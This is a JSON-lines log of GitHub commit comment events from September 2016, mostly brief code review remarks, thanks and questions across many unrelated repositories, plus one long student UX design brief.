{"id":"4616569829","type":"CommitCommentEvent","actor":{"login":"jigarkhalas28"},"repo":{"name":"jigarkhalas28/hello-world"},"payload":{"comment":{"id":19169315,"position":null,"line":null,"path":null,"commit_id":"258b2cf11e33a5ec3ba0dfae20c22fb78a59391e","created_at":"2016-09-26T09:04:47Z","updated_at":"2016-09-26T09:04:47Z","body":"To mearge "}},"created_at":"2016-09-26T09:04:47Z"}
{"id":"4616570262","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19169316,"position":null,"line":null,"path":null,"commit_id":"c592e888fabf1fe87b676d929b743e01aa4706c9","created_at":"2016-09-26T09:04:53Z","updated_at":"2016-09-26T09:04:53Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Admin views](https://trello.com/c/Sg8YOFVj/12-admin-views)"}},"created_at":"2016-09-26T09:04:53Z"}
{"id":"4616572951","type":"CommitCommentEvent","actor":{"login":"jorgegorka"},"repo":{"name":"finddx/cdx"},"payload":{"comment":{"id":19169321,"position":4,"line":47,"path":"cdx_vietnam/app/assets/javascripts/application.js","commit_id":"834ca514931c781160480d7e64d3774ce39eae2f","created_at":"2016-09-26T09:05:29Z","updated_at":"2016-09-26T09:05:29Z","body":"I don't understand your comment.  It's not removed."}},"created_at":"2016-09-26T09:05:29Z"}
{"id":"4616575783","type":"CommitCommentEvent","actor":{"login":"Sachinhassankumar"},"repo":{"name":"Sachinhassankumar/Hello-World"},"payload":{"comment":{"id":19169329,"position":null,"line":null,"path":null,"commit_id":"06e3f9ce417b3acf10c1e2c8a29e95b8b5727681","created_at":"2016-09-26T09:06:07Z","updated_at":"2016-09-26T09:06:07Z","body":"It should have been \"Getting started with the world of GitHub\""}},"created_at":"2016-09-26T09:06:07Z"}
{"id":"4616579234","type":"CommitCommentEvent","actor":{"login":"koenbok"},"repo":{"name":"koenbok/Framer"},"payload":{"comment":{"id":19169335,"position":null,"line":null,"path":null,"commit_id":"3a113dfbecc7204d0fab90bdde4034fab4934893","created_at":"2016-09-26T09:06:52Z","updated_at":"2016-09-26T09:06:52Z","body":"👌"}},"created_at":"2016-09-26T09:06:52Z"}
{"id":"4616580308","type":"CommitCommentEvent","actor":{"login":"bifa86"},"repo":{"name":"bifa86/test-mon-projet"},"payload":{"comment":{"id":19169338,"position":20,"line":20,"path":"ct/ClientTPJWS/src/ws/GetComptes.java","commit_id":"1bbce089dd6c39c205a015764d9789ab41785381","created_at":"2016-09-26T09:07:07Z","updated_at":"2016-09-26T09:07:07Z","body":"hjghj"}},"created_at":"2016-09-26T09:07:07Z"}
{"id":"4616585231","type":"CommitCommentEvent","actor":{"login":"balat"},"repo":{"name":"ocsigen/eliom"},"payload":{"comment":{"id":19169349,"position":null,"line":null,"path":null,"commit_id":"73f5df267ca54ba0e7e5f8819dfac77262687299","created_at":"2016-09-26T09:08:08Z","updated_at":"2016-09-26T09:08:08Z","body":"Why is the type different from server side?"}},"created_at":"2016-09-26T09:08:08Z"}
{"id":"4616585572","type":"CommitCommentEvent","actor":{"login":"Mic92"},"repo":{"name":"RonnyPfannschmidt/nixpkgs"},"payload":{"comment":{"id":19169351,"position":1,"line":1,"path":"pkgs/tools/security/enpass/fet-urls.sh","commit_id":"ffa3c11bbb047a31c1fd8f6e1b25b48548ef037c","created_at":"2016-09-26T09:08:12Z","updated_at":"2016-09-26T09:08:12Z","body":"where is this script used?"}},"created_at":"2016-09-26T09:08:12Z"}
{"id":"4616585582","type":"CommitCommentEvent","actor":{"login":"j512581813"},"repo":{"name":"j512581813/sea"},"payload":{"comment":{"id":19169352,"position":null,"line":null,"path":null,"commit_id":"9af49cdb0d3438d8e586719de00490f1b0d2341f","created_at":"2016-09-26T09:08:12Z","updated_at":"2016-09-26T09:08:12Z","body":"1111"}},"created_at":"2016-09-26T09:08:12Z"}
{"id":"4616586811","type":"CommitCommentEvent","actor":{"login":"DevAlansc"},"repo":{"name":"icanzilb/TaskQueue"},"payload":{"comment":{"id":19169355,"position":null,"line":null,"path":null,"commit_id":"bdbc7cc65d28073efde4133aff4b5ca1b3694058","created_at":"2016-09-26T09:08:28Z","updated_at":"2016-09-26T09:08:28Z","body":"Hi,\r\nI'm using the podfile to update the library and it always returns the version 0.9.10. When will the latest version be available? Thanks.\r\n\r\n"}},"created_at":"2016-09-26T09:08:28Z"}
{"id":"4616591757","type":"CommitCommentEvent","actor":{"login":"jorgegorka"},"repo":{"name":"finddx/cdx"},"payload":{"comment":{"id":19169364,"position":8,"line":203,"path":"cdx_core/app/models/encounter.rb","commit_id":"834ca514931c781160480d7e64d3774ce39eae2f","created_at":"2016-09-26T09:09:33Z","updated_at":"2016-09-26T09:09:33Z","body":"Sure, change it.\r\n\r\nPerformance is not a problem right now.  I think 15ms. are totally acceptable. When the time comes to improve performance we can cache them as you suggest."}},"created_at":"2016-09-26T09:09:33Z"}
{"id":"4616593531","type":"CommitCommentEvent","actor":{"login":"Yanhaolin"},"repo":{"name":"Yanhaolin/dango"},"payload":{"comment":{"id":19169371,"position":39,"line":39,"path":"index.html","commit_id":"fe8ced94ffc72554e38a124bb006d476a172b067","created_at":"2016-09-26T09:09:57Z","updated_at":"2016-09-26T09:09:57Z","body":"0.0"}},"created_at":"2016-09-26T09:09:57Z"}
{"id":"4616595619","type":"CommitCommentEvent","actor":{"login":"jerryshaw12"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19169375,"position":null,"line":null,"path":null,"commit_id":"8715ccad23b1e2d9e258741138419a024a50a799","created_at":"2016-09-26T09:10:23Z","updated_at":"2016-09-26T09:10:23Z","body":"haha, so that's the reason i didn't found any change, my device still 5.1.1"}},"created_at":"2016-09-26T09:10:23Z"}
{"id":"4616597618","type":"CommitCommentEvent","actor":{"login":"magol"},"repo":{"name":"dokan-dev/dokan-dotnet"},"payload":{"comment":{"id":19169378,"position":null,"line":null,"path":null,"commit_id":"c89f9dc8cc02115d537e92d156e22ca6af7d8acf","created_at":"2016-09-26T09:10:48Z","updated_at":"2016-09-26T09:10:48Z","body":"Strange, neither do I understand why this happens. But it was a uncontroversial fix the problem. Great work."}},"created_at":"2016-09-26T09:10:48Z"}
{"id":"4616600930","type":"CommitCommentEvent","actor":{"login":"marek-safar"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":19169385,"position":158,"line":2853,"path":"mcs/class/System/System.Net.Sockets/Socket.cs","commit_id":"13c15c25fb349ab80fbdc930f885800e8ad4b8ac","created_at":"2016-09-26T09:11:29Z","updated_at":"2016-09-26T09:11:29Z","body":"Why not use await instead? Secondly, is really CleanUp intended to be queued asynchronously?"}},"created_at":"2016-09-26T09:11:29Z"}
{"id":"4616607216","type":"CommitCommentEvent","actor":{"login":"tyoshino"},"repo":{"name":"whatwg/encoding"},"payload":{"comment":{"id":19169399,"position":89,"line":1380,"path":"Overview.src.html","commit_id":"9224c4cad81fd5720306fe79241cf04b5526a3f0","created_at":"2016-09-26T09:12:51Z","updated_at":"2016-09-26T09:12:51Z","body":"encoding -> encoder"}},"created_at":"2016-09-26T09:12:51Z"}
{"id":"4616607288","type":"CommitCommentEvent","actor":{"login":"longgui0318"},"repo":{"name":"race604/react-native-viewpager"},"payload":{"comment":{"id":19169400,"position":null,"line":null,"path":null,"commit_id":"08b9a4bda68a08b131fb86d3afb7fd528594ca94","created_at":"2016-09-26T09:12:51Z","updated_at":"2016-09-26T09:12:51Z","body":"@race604 哥们release一个版本 修复一下Issues呗，测试过了，OK的"}},"created_at":"2016-09-26T09:12:51Z"}
{"id":"4616608054","type":"CommitCommentEvent","actor":{"login":"tyoshino"},"repo":{"name":"whatwg/encoding"},"payload":{"comment":{"id":19169403,"position":274,"line":1565,"path":"Overview.src.html","commit_id":"9224c4cad81fd5720306fe79241cf04b5526a3f0","created_at":"2016-09-26T09:13:02Z","updated_at":"2016-09-26T09:13:02Z","body":"encoding -> encoder"}},"created_at":"2016-09-26T09:13:02Z"}
{"id":"4616615876","type":"CommitCommentEvent","actor":{"login":"j512581813"},"repo":{"name":"j512581813/sea"},"payload":{"comment":{"id":19169417,"position":null,"line":null,"path":null,"commit_id":"ebeee2f2fdef8d70dd4586e393b36352fbd3ce6c","created_at":"2016-09-26T09:14:42Z","updated_at":"2016-09-26T09:14:42Z","body":"das"}},"created_at":"2016-09-26T09:14:42Z"}
{"id":"4616616132","type":"CommitCommentEvent","actor":{"login":"vasilisp"},"repo":{"name":"ocsigen/eliom"},"payload":{"comment":{"id":19169418,"position":null,"line":null,"path":null,"commit_id":"73f5df267ca54ba0e7e5f8819dfac77262687299","created_at":"2016-09-26T09:14:46Z","updated_at":"2016-09-26T09:14:46Z","body":"Because we do not distinguish between `browser_content` and\n`application_content` on the client. I assumed that we always want to\nstay in the application, so the distinction is not needed. But this is\nopen to debate.\n\nOn Mon, Sep 26, 2016, at 11:08, Vincent Balat wrote:\n> Why is the type different from server side?\n>\n> --\n> You are receiving this because you authored the thread.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/ocsigen/eliom/commit/73f5df267ca54ba0e7e5f8819dfac77262687299#commitcomment-19169349\n"}},"created_at":"2016-09-26T09:14:46Z"}
{"id":"4616617966","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19169426,"position":null,"line":null,"path":null,"commit_id":"32095be1c1c3f9870702d69fd875b58036460db2","created_at":"2016-09-26T09:15:09Z","updated_at":"2016-09-26T09:15:09Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36055/testReport/) for this commit**"}},"created_at":"2016-09-26T09:15:09Z"}
{"id":"4616620817","type":"CommitCommentEvent","actor":{"login":"nikhilvallishayee"},"repo":{"name":"nikhilvallishayee/faye_spike"},"payload":{"comment":{"id":19169430,"position":null,"line":null,"path":null,"commit_id":"e2047fe2ad4e3e15cfc6a20c985dfa3c450212da","created_at":"2016-09-26T09:15:46Z","updated_at":"2016-09-26T09:15:46Z","body":"looks good"}},"created_at":"2016-09-26T09:15:46Z"}
{"id":"4616625713","type":"CommitCommentEvent","actor":{"login":"JonasDralle"},"repo":{"name":"zacfermanis/yardsalehelper_old"},"payload":{"comment":{"id":19169443,"position":34,"line":34,"path":"src/main/java/yardsalehelper/config/WebSecurityConfig.java","commit_id":"f589ca451493f54c618ce871f3fb6c04b27f0158","created_at":"2016-09-26T09:16:48Z","updated_at":"2016-09-26T09:16:48Z","body":"password exposed"}},"created_at":"2016-09-26T09:16:48Z"}
{"id":"4616628496","type":"CommitCommentEvent","actor":{"login":"glensc"},"repo":{"name":"resin-io/qemu"},"payload":{"comment":{"id":19169452,"position":null,"line":null,"path":null,"commit_id":"782e5bb77014ff136f7bb6133a911e5f53e914a7","created_at":"2016-09-26T09:17:24Z","updated_at":"2016-09-26T09:17:24Z","body":"the changes are trivial. i'll publish them shortly after build finishes"}},"created_at":"2016-09-26T09:17:24Z"}
{"id":"4616628941","type":"CommitCommentEvent","actor":{"login":"balat"},"repo":{"name":"ocsigen/eliom"},"payload":{"comment":{"id":19169454,"position":null,"line":null,"path":null,"commit_id":"73f5df267ca54ba0e7e5f8819dfac77262687299","created_at":"2016-09-26T09:17:28Z","updated_at":"2016-09-26T09:17:28Z","body":"Ok thaks. I'm trying this."}},"created_at":"2016-09-26T09:17:28Z"}
{"id":"4616632171","type":"CommitCommentEvent","actor":{"login":"petrosagg"},"repo":{"name":"resin-io/qemu"},"payload":{"comment":{"id":19169459,"position":null,"line":null,"path":null,"commit_id":"782e5bb77014ff136f7bb6133a911e5f53e914a7","created_at":"2016-09-26T09:18:10Z","updated_at":"2016-09-26T09:18:10Z","body":"Awesome! thanks"}},"created_at":"2016-09-26T09:18:10Z"}
{"id":"4616633402","type":"CommitCommentEvent","actor":{"login":"sysradium"},"repo":{"name":"python-oca/python-oca"},"payload":{"comment":{"id":19169463,"position":92,"line":112,"path":"oca/vm.py","commit_id":"11519d6fb500e5342d29502aec36006b8f4c157e","created_at":"2016-09-26T09:18:26Z","updated_at":"2016-09-26T09:18:26Z","body":"Done"}},"created_at":"2016-09-26T09:18:26Z"}
{"id":"4616635587","type":"CommitCommentEvent","actor":{"login":"brambledn"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19169468,"position":385,"line":385,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-26T09:18:55Z","updated_at":"2016-09-26T09:18:55Z","body":"这里应该是 currentTarget"}},"created_at":"2016-09-26T09:18:55Z"}
{"id":"4616637675","type":"CommitCommentEvent","actor":{"login":"alexdor"},"repo":{"name":"techministry/new_website"},"payload":{"comment":{"id":19169474,"position":4,"line":238,"path":"src/scss/creative.scss","commit_id":"778af08b522a66f091c5fc92e4b19b548d292d6f","created_at":"2016-09-26T09:19:22Z","updated_at":"2016-09-26T09:19:22Z","body":"Scss style-guide suggests to declare each color as a variable."}},"created_at":"2016-09-26T09:19:22Z"}
{"id":"4616637694","type":"CommitCommentEvent","actor":{"login":"tomviner"},"repo":{"name":"python/cpython"},"payload":{"comment":{"id":19169475,"position":null,"line":null,"path":null,"commit_id":"d7bf0e86c35fca35d1ad25d78434b1f596020ed0","created_at":"2016-09-26T09:19:23Z","updated_at":"2016-09-26T09:19:23Z","body":"Yeah I found [pythonrun.c](https://github.com/python/cpython/blob/master/Python/pythonrun.c) by searching for `>>> ` but couldn't see where functions like `PyRun_InteractiveLoop` / `PyRun_InteractiveLoopFlags` where being called.\r\n\r\nI do agree that there's no need for the catching to apply to non REPL code though. Can you see where we should insert the patch?"}},"created_at":"2016-09-26T09:19:23Z"}
{"id":"4616639108","type":"CommitCommentEvent","actor":{"login":"pascalbetz"},"repo":{"name":"SumOfUs/Champaign"},"payload":{"comment":{"id":19169478,"position":19,"line":19,"path":"app/services/action_params_builder.rb","commit_id":"a8dbf53d827e4c16ffd808afa5df162e39636ee4","created_at":"2016-09-26T09:19:41Z","updated_at":"2016-09-26T09:19:41Z","body":"This method is not used?"}},"created_at":"2016-09-26T09:19:41Z"}
{"id":"4616639280","type":"CommitCommentEvent","actor":{"login":"jakearchibald"},"repo":{"name":"whatwg/encoding"},"payload":{"comment":{"id":19169480,"position":null,"line":null,"path":null,"commit_id":"9224c4cad81fd5720306fe79241cf04b5526a3f0","created_at":"2016-09-26T09:19:44Z","updated_at":"2016-09-26T09:19:44Z","body":"This is exciting! I guess we couldn't just add {writable, readable} to the TextEncoder instance?"}},"created_at":"2016-09-26T09:19:44Z"}
{"id":"4616640756","type":"CommitCommentEvent","actor":{"login":"pascalbetz"},"repo":{"name":"SumOfUs/Champaign"},"payload":{"comment":{"id":19169484,"position":8,"line":8,"path":"app/services/action_params_builder.rb","commit_id":"a8dbf53d827e4c16ffd808afa5df162e39636ee4","created_at":"2016-09-26T09:20:02Z","updated_at":"2016-09-26T09:20:02Z","body":"IMHO you should not pass the controller to a service. Makes it harder to test."}},"created_at":"2016-09-26T09:20:02Z"}
{"id":"4616641158","type":"CommitCommentEvent","actor":{"login":"hipkiss91"},"repo":{"name":"hipkiss91/GitTodo"},"payload":{"comment":{"id":19169488,"position":36,"line":15,"path":"GitTodo.sublime-settings","commit_id":"1c022fa72f798dda48e38fb06df2a812097512b3","created_at":"2016-09-26T09:20:08Z","updated_at":"2016-09-26T09:20:08Z","body":"test"}},"created_at":"2016-09-26T09:20:08Z"}
{"id":"4616647850","type":"CommitCommentEvent","actor":{"login":"aidentumwesigye"},"repo":{"name":"aidentumwesigye/PipoServer"},"payload":{"comment":{"id":19169507,"position":null,"line":null,"path":null,"commit_id":"4800bff4f3430ae0bad326aecfb4c7d7e927bc98","created_at":"2016-09-26T09:21:31Z","updated_at":"2016-09-26T09:21:31Z","body":"Am merging with lilian"}},"created_at":"2016-09-26T09:21:31Z"}
{"id":"4616651342","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19169516,"position":null,"line":null,"path":null,"commit_id":"f6829d1bcf24e22307bd9e3966ddce95c440d549","created_at":"2016-09-26T09:22:15Z","updated_at":"2016-09-26T09:22:15Z","body":"ok. brought in your most recent changes.\r\n\r\nFor your next work, make a new branch and begin working from the most recent official development master branch. Note I had to remove all the whitespace changes, which we can avoid if you begin working from the most recent master branch. This will also incorporate a recent change I made to your form while cleaning out the concurrent global from the codebase. Doing this will avoid reverting changes, such as this code, which I added back:\r\nhttps://github.com/openemr/openemr/commit/27a1419014ae2373adf929a130c28b17bd0e64cc\r\n\r\nMost importantly, though, don't stop coding (ie. anything can be fixed)."}},"created_at":"2016-09-26T09:22:15Z"}
{"id":"4616651467","type":"CommitCommentEvent","actor":{"login":"RabiatulNadhirah"},"repo":{"name":"1601-mma2013/Mekuuby"},"payload":{"comment":{"id":19169517,"position":null,"line":null,"path":null,"commit_id":"7f067930877619e6492ad8ab56be5640a545c869","created_at":"2016-09-26T09:22:17Z","updated_at":"2016-09-26T09:22:17Z","body":"Group Member's Name:\r\n•\tRabiatul Nahdirah Binti Rizuan (1132702898)\r\n•\tMekulilo Ndeshipanda Kakonya (1132700837)\r\n\r\nUseful Mesurment.\r\nI. Analysis\r\n1. Research\r\na. Scope\r\nObjectives – increase your organization on the job and allow you to measure difficult surfaces much more easily. Designed to give more experience on tape measurement that helps to measure, organize, and analyse any size measurements in a smart way.\r\nb. Audit\r\nExisting work and product : https://www.kickstarter.com/projects/bagel-labs/bagel-the-worlds-smartest-tape-measure\r\nCompetitors\r\n \r\n•\talternatives \r\n•\treplacement  \r\n\r\nAdvance technology\r\n1.\trelevant technologies \r\n•\tTape measure\r\n•\tMeasuring Wheels\r\n•\tLaser measuring device\r\n\r\nc. Stakeholder Interviews (internal / external)\r\nUnderstand product vision and constraints \r\n•\tProduct {project} vision\r\n1.\trisk\r\ni.\tSomeone might spill liquid on it and might end up not working.(not water resistance)\r\n2.\tObstacles\r\ni.\tlimited to room temperature conditions\r\nii.\tQuite expensive\r\n\r\n3.\tconstraints\r\ni.\tInternal limitations\r\na.\tDurable device no matter how high it falls from and nothing will happen to it.\r\n\r\n4.\topportunities\r\ni.\tIn spite of the obstacles we have this project has strength from expense problems which the price negotiable. Besides that , it should withstand in any kind of temperature.\r\n\r\nii.\tPersisting problem\r\n5.\tusers\r\nd. User observations\r\nUnderstand user needs and behaviour and describe it. Find various aspect of audience/customer\r\n1.\tUsers – open to age 18 upward \r\n2.\tpotential users – Anyone who is involve in architecture-work base or for personal use.\r\n3.\t(user’s) behaviours\r\n4.\t(user’s) attitudes\r\n5.\t(user’s) aptitudes\r\no\tuser’s ability to learn something quickly and do it well\r\n6.\t(user’s) motivations\r\n7.\t(user’s) environments\r\n8.\t(user’s) tools\r\n9.\t(user’s) challenges\r\n\r\n2. Modeling\r\na. Personas\r\nuser and customer archetypes\r\n1.\tGoals : Able to do his work by himself.\r\n2.\tBehaviours : Independence and be able to stand on his own feet.\r\n3.\tAttitudes : He loves to try out any kind of new things that comes.\r\n4.\tAptitudes : He is a “ride of die” person, he loves taking risk to improve his life.\r\n5.\tEnvironments : Public / personal space.\r\n6.\tTools : Hand, sight , hearing\r\n7.\tChallenges : He only has one hand(disable) \r\n\r\n\r\n\r\n\r\nb. Other Models\r\nRepresent domain factors beyond individual users and customers 1. Workflows among multiple people\r\n1.\tenvironments\r\n2.\tArtifacts\r\nII. Synthesis\r\n1. Requirements Definition\r\na. Context Scenarios//\r\nb. Other Models\r\nRepresent domain factors beyond individual users and customers \r\n1. Workflows among multiple people\r\n1.\tenvironments\r\n2.\tArtifact\r\nII. Synthesis\r\n1. Requirements Definition\r\na. Context Scenarios\r\n\r\n\r\n\r\n\r\n\r\nMR SAM \r\nAN ENERGETIC AND TALENTED MAN IN HIS LATE 50s OWNS A CONSTRUCTING COMPANY. THE FACT THAT IN MOST CASES HE WORKS FROM HOME, HE ALWAYS ASSURES THAT HIS WORKERS ARE BEING MANAGED AND THAT THE WORK IS CARRIED OUT EFFECTIVELY.\r\nSINCE HE IS A DISABLED MAN WITH ONLY ONE ARM, IT DOESN’T DETER HIM FROM DOING HIS JOB. SO ONE DAY HE WANTED TO ORDER A BELT FOR HIS SON FROM ONLINE, SINCE HE WASN’T SURE OF HIS SONS WAIST HE SIMPLY JUST SWITCHED ON THE BAGEL’S WHEEL MODE AND ROLL THE WHEEL AROUND HIS WAIST. IN ADDITION, SINCE HE DOESN’T LIKE TO BE SEEN INCAPABLE, HE SOMETIMES DOES HIS EMPLOYERS WORK USING BAGELS REMOTE TO MEASURE THE WALLS AND CEILLLINGS.\r\nMR SAM EXPERIENCES PROBLEMS WHEN COMES TO MEASURING LONG OR TALL OBJECTS BECAUSE OF HIS HEIGHT SO HE COULD NOT REACH THE HIGH CEILING.\r\nHE IS ALSO GETS CLUMBSY AR TIMES, ONE DAY HE DROPPED THE BAGEL IN TO A BUCKET OF WATER THEN IT STOPPPED WORKING.\r\n\r\n\r\nb. Requirements\r\nDescribe necessary capabilities of the product\r\n•\tFunctional and data needs\r\n\tThe bagel needs a long a handle attached to it to make work easier\r\n\tIt should a water and heat resistant\r\n•\tuser mental models\r\n•\tdesign imperatives\r\n•\tproduct vision\r\n•\tbusiness requirements\r\n•\ttechnology\r\n2. Design Framework\r\na. Elements\r\nDeﬁne manifestations of information and functionality \r\n1. Information\r\n 2. form factor \r\n3. posture\r\n 4. input method\r\n1.\tfunctional and data elements\r\no\tinformation\r\no\tfunctions\r\no\tmechanisms\r\no\tactions\r\no\tdomain object models\r\nb. Framework\r\nDesign overall structure of user experience\r\n1.\tSketch\r\ni.\tif your project is a design product\r\na.\tYour sketch must be a wireframe.\r\nii.\tif your project is a installation project\r\na.\tYour sketch must be a installation sketch.\r\niii.\tMust have\r\na.\tgroupings and hierarchy\r\nb.\tTerritories of each functional & design elements\r\nc.\tArrangements of containers & components\r\n2.\tKey path Scenario\r\n\r\n"}},"created_at":"2016-09-26T09:22:17Z"}
{"id":"4616651643","type":"CommitCommentEvent","actor":{"login":"jerome-franco"},"repo":{"name":"preboot/angular2-webpack"},"payload":{"comment":{"id":19169518,"position":null,"line":null,"path":null,"commit_id":"c668fc32e25b792d09e280833086948d22cac864","created_at":"2016-09-26T09:22:19Z","updated_at":"2016-09-26T09:22:19Z","body":"How can I use the types now?"}},"created_at":"2016-09-26T09:22:19Z"}
{"id":"4616656320","type":"CommitCommentEvent","actor":{"login":"Foxandxss"},"repo":{"name":"preboot/angular2-webpack"},"payload":{"comment":{"id":19169531,"position":null,"line":null,"path":null,"commit_id":"c668fc32e25b792d09e280833086948d22cac864","created_at":"2016-09-26T09:23:20Z","updated_at":"2016-09-26T09:23:20Z","body":"Typescript sees it automatically\n\nEl 26 sept. 2016 10:22, \"Jerome\" <notifications@github.com> escribió:\n\n> How can I use the types now?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/preboot/angular2-webpack/commit/c668fc32e25b792d09e280833086948d22cac864#commitcomment-19169518>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABCZ1br0u1Bbn8zni5MteJ30YMbCADsDks5qt47MgaJpZM4KGTnT>\n> .\n>\n"}},"created_at":"2016-09-26T09:23:20Z"}
{"id":"4616662417","type":"CommitCommentEvent","actor":{"login":"huni1lian"},"repo":{"name":"huni1lian/Daily"},"payload":{"comment":{"id":19169552,"position":null,"line":null,"path":null,"commit_id":"f976ebcca1aa30060e753a973042ed9a8ec3ae58","created_at":"2016-09-26T09:24:39Z","updated_at":"2016-09-26T09:24:39Z","body":":sun_with_face:"}},"created_at":"2016-09-26T09:24:39Z"}
{"id":"4616666093","type":"CommitCommentEvent","actor":{"login":"aa65535"},"repo":{"name":"pexcn/SimpleUtils"},"payload":{"comment":{"id":19169563,"position":null,"line":null,"path":null,"commit_id":"0cf0083bf25e5284dfc4b66f6f8e1ed74e2553a9","created_at":"2016-09-26T09:25:23Z","updated_at":"2016-09-26T09:25:23Z","body":"如果想要全局的 Dialog, 但是这个 Dialog 不想依附任何一个 Activity, 这样的话可以使用 WindowManager."}},"created_at":"2016-09-26T09:25:23Z"}
{"id":"4616671638","type":"CommitCommentEvent","actor":{"login":"reyalpsirc"},"repo":{"name":"reyalpsirc/FFImageLoading"},"payload":{"comment":{"id":19169577,"position":null,"line":null,"path":null,"commit_id":"142f2c0af9723dc10ee49de69f97a002061db38e","created_at":"2016-09-26T09:26:30Z","updated_at":"2016-09-26T09:26:30Z","body":"Thanks! :)"}},"created_at":"2016-09-26T09:26:30Z"}
{"id":"4616671948","type":"CommitCommentEvent","actor":{"login":"ziafazal"},"repo":{"name":"open-craft/edx-platform"},"payload":{"comment":{"id":19169579,"position":32,"line":32,"path":"openedx/core/lib/xblock_builtin/xblock_discussion/static/js/discussion_classes.js","commit_id":"117350e2aad0aacf7e6218b65c0bdab2faf33d38","created_at":"2016-09-26T09:26:35Z","updated_at":"2016-09-26T09:26:35Z","body":"@itsjeyd what would be configuration of this requirejs? i.e. `base_url`"}},"created_at":"2016-09-26T09:26:35Z"}
{"id":"4616673390","type":"CommitCommentEvent","actor":{"login":"jerome-franco"},"repo":{"name":"preboot/angular2-webpack"},"payload":{"comment":{"id":19169582,"position":null,"line":null,"path":null,"commit_id":"c668fc32e25b792d09e280833086948d22cac864","created_at":"2016-09-26T09:26:53Z","updated_at":"2016-09-26T09:26:53Z","body":"Awesome. Thanks"}},"created_at":"2016-09-26T09:26:53Z"}
{"id":"4616688550","type":"CommitCommentEvent","actor":{"login":"Chobo-Stefan"},"repo":{"name":"Chobolabs/chobo-shl"},"payload":{"comment":{"id":19169608,"position":44,"line":44,"path":"include/chobo/static_vector.hpp","commit_id":"138df4857e1d32b16736415952bfea55f882add6","created_at":"2016-09-26T09:30:05Z","updated_at":"2016-09-26T09:30:05Z","body":"capacity 4 :)"}},"created_at":"2016-09-26T09:30:05Z"}
{"id":"4616688705","type":"CommitCommentEvent","actor":{"login":"foosel"},"repo":{"name":"kennethjiang/OctoPrint-Slicer"},"payload":{"comment":{"id":19169610,"position":4,"line":14,"path":"setup.py","commit_id":"610558d87015ace1c45076192457df909f330b8f","created_at":"2016-09-26T09:30:08Z","updated_at":"2016-09-26T09:30:08Z","body":"Leaving that at OctoPrint-Slicer (and overriding the displayed name via `__plugin_name__` in your plugin's `__init__.py`) would have been better, because now it installs on people's python installs as \"Full-featured-slicer\". A bit confusing and doesn't allow you to find anything OctoPrint-related in your local python install anymore just by `pip freeze | grep ^OctoPrint-`. That's why the cookiecutter template prepares the project that way :)"}},"created_at":"2016-09-26T09:30:08Z"}
{"id":"4616688954","type":"CommitCommentEvent","actor":{"login":"MikeUnwalla"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19169612,"position":null,"line":null,"path":null,"commit_id":"789fdaf49f970e33a7b95560f703b6204298303f","created_at":"2016-09-26T09:30:10Z","updated_at":"2016-09-26T09:30:10Z","body":"All the words are OK. Although in the list, 'Yep' is initial upper case, LanguageTool-20160925-snapshot correctly does not give an error message for initial lower case 'yep'.\r\n\r\nLanguageTool-20160925-snapshot gives a 'spelling mistake' message for 'otitis'."}},"created_at":"2016-09-26T09:30:10Z"}
{"id":"4616690626","type":"CommitCommentEvent","actor":{"login":"iAsiby"},"repo":{"name":"iAsiby/2048"},"payload":{"comment":{"id":19169614,"position":null,"line":null,"path":null,"commit_id":"4310f45ba787c204e99239ba1b3cc3b86258f440","created_at":"2016-09-26T09:30:28Z","updated_at":"2016-09-26T09:30:28Z","body":"JDK & JRE  1.8.0_102"}},"created_at":"2016-09-26T09:30:28Z"}
{"id":"4616693158","type":"CommitCommentEvent","actor":{"login":"ncraike"},"repo":{"name":"girvo/dup"},"payload":{"comment":{"id":19169637,"position":4,"line":8,"path":"CHANGES.md","commit_id":"ecf57ca73b50dd317a81c54e266efe3d30cd3ed5","created_at":"2016-09-26T09:31:00Z","updated_at":"2016-09-26T09:31:00Z","body":"Should the parenthetical here be \"if **not** specified, it still…\"?"}},"created_at":"2016-09-26T09:31:00Z"}
{"id":"4616697593","type":"CommitCommentEvent","actor":{"login":"girvo"},"repo":{"name":"girvo/dup"},"payload":{"comment":{"id":19169646,"position":4,"line":8,"path":"CHANGES.md","commit_id":"ecf57ca73b50dd317a81c54e266efe3d30cd3ed5","created_at":"2016-09-26T09:31:57Z","updated_at":"2016-09-26T09:31:57Z","body":"Yep! Sorry, bad editing on my behalf\n\nSent from my iPhone\n\n> On 26 Sep. 2016, at 7:31 pm, Nathan Craike <notifications@github.com> wrote:\n> \n> Should the parenthetical here be \"if not specified, it still…\"?\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-26T09:31:57Z"}
{"id":"4616701779","type":"CommitCommentEvent","actor":{"login":"jacob4684"},"repo":{"name":"jacob4684/Character"},"payload":{"comment":{"id":19169654,"position":5,"line":32,"path":"Game/NonPlayerCharacter.cs","commit_id":"8b03fae05cec6aa78c346545a05275c12b2e7d5c","created_at":"2016-09-26T09:32:51Z","updated_at":"2016-09-26T09:32:51Z","body":"32 git fejl ?"}},"created_at":"2016-09-26T09:32:51Z"}
{"id":"4616704120","type":"CommitCommentEvent","actor":{"login":"ncraike"},"repo":{"name":"girvo/dup"},"payload":{"comment":{"id":19169665,"position":null,"line":null,"path":null,"commit_id":"ecf57ca73b50dd317a81c54e266efe3d30cd3ed5","created_at":"2016-09-26T09:33:21Z","updated_at":"2016-09-26T09:33:21Z","body":"The nim code looks good. And surprisingly I can make sense of it without much trouble at all."}},"created_at":"2016-09-26T09:33:21Z"}
